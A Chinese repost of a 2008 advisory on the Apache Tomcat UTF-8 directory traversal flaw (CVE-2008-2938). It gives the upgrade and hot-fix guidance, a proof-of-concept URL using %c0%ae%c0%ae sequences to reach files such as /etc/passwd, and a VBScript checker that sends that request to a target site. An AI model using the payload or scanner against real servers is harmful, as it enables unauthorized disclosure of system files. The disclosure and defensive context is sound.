Apache Tomcat UTF-8 漏洞解析
本文详细介绍了 Apache Tomcat 中一个高危远程文件泄露漏洞,该漏洞源于处理 UTF-8 编码时的问题。当配置文件允许 'allowLinking' 和 'URIencoding' 为 'UTF-8' 时,攻击者能够访问系统中的敏感文件。
Apache Tomcat出了一个类似当年IIS url 编码的漏洞。漏洞发生在Apache Tomcat处理UTF-8编码时,没有正确转换,从而导致在处理包含%c0%ae%c0%ae的url时转换为类似../的形式,使得可以遍历系统任意文件,包括
/etc/passwd等
触发的条件为Apache Tomcat的配置文件context.xml 或 server.xml 的'allowLinking' 和 'URIencoding' 允许'UTF-8'选项
Title: Apache Tomcat Directory Traversal Vulnerability Author: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com) Severity: High Impact: Remote File Disclosure Vulnerable Version: prior to 6.0.18 Solution: - Best Choice: Upgrade to 6.0.18 (http://tomcat.apache.org) - Hot fix: Disable allowLinking or do not set URIencoding to utf8 in order to avoid this vulnerability. - Tomcat 5.5.x and 4.1.x Users: The fix will be included in the next releases. Please apply the hot fix until next release. References: - http://tomcat.apache.org/security.html - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938 History: - 07.17.2008: Initiate notify (To Apache Security Team) - 08.02.2008: Responsed this problem fixed and released new version - 08.05.2008: Notify disclosure (To Apache Tomcat Security Team) - 08.10.2008: Responsed with some suggestions. Description As Apache Security Team, this problem occurs because of JAVA side. If your context.xml or server.xml allows 'allowLinking'and 'URIencoding' as 'UTF-8', an attacker can obtain your important system files.(e.g. /etc/passwd) Exploit If your webroot directory has three depth(e.g /usr/local/wwwroot), An attacker can access arbitrary files as below. (Proof-of-concept) http://www.target.com/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar # milw0rm.com [2008-08-11]
VBS 测试版:
Dim strUrl,strSite showB() Set Args = Wscript.Arguments If Args.Count <> 1 Then ShowU() Else strSite=Args(0) End If strUrl="/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar" Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.Open "GET",strSite & strUrl, False objXML.SetRequestHeader "Referer", strSite objXML.send() if objXML.status=200 then wscript.echo("存在漏洞") end if Sub showB() With Wscript .Echo("+--------------------------=====================------------------------------+") .Echo("Exploit Apache Tomcat UTF-8") .Echo("Code By Safe3") .Echo("+--------------------------=====================------------------------------+") End with End Sub Sub showU() With Wscript .Echo("+--------------------------=====================------------------------------+") .Echo("用法:") .Echo(" cscript "&.ScriptName&" site") .Echo("例子:") .Echo(" cscript "&.ScriptName&" http://www.example.com >result.txt") .Echo("+--------------------------=====================------------------------------+") .Quit End with End Sub
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
